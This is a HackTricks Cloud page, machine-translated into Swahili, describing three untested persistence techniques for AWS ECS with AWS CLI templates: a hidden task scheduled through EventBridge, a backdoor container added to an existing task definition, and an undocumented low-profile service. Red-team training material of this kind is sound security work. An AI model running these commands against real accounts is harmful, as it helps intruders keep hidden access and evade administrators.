AWS - ECS Persistence

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

ECS

Kwa maelezo zaidi angalia:

AWS - ECS Enum

Kazi ya ECS ya Kila Wakati Isiyoonekana

TODO: Jaribu

Mshambuliaji anaweza kuunda kazi ya ECS ya kila wakati isiyoonekana kwa kutumia Amazon EventBridge ili kuweka ratiba ya utekelezaji wa kazi mbaya kila wakati. Kazi hii inaweza kufanya upelelezi, kuhamasisha data, au kudumisha kudumu katika akaunti ya AWS.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"

# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'

Backdoor Container katika Mwelekeo wa Kazi wa ECS uliopo

TODO: Test

Mshambuliaji anaweza kuongeza konteina ya nyuma isiyoonekana katika mwelekeo wa kazi wa ECS uliopo ambayo inafanya kazi pamoja na konteinia halali. Konteina ya nyuma inaweza kutumika kwa kudumu na kufanya shughuli za uhalifu.

# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'

Huduma ya ECS Isiyoandikwa

TODO: Test

Mshambuliaji anaweza kuunda huduma ya ECS isiyoandikwa inayokimbiza kazi mbaya. Kwa kuweka idadi inayotakiwa ya kazi kuwa ya chini na kuzima uandishi wa kumbukumbu, inakuwa vigumu kwa wasimamizi kugundua huduma hiyo mbaya.

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - ECR Persistence NextAWS - Elastic Beanstalk Persistence

Last updated 1 month ago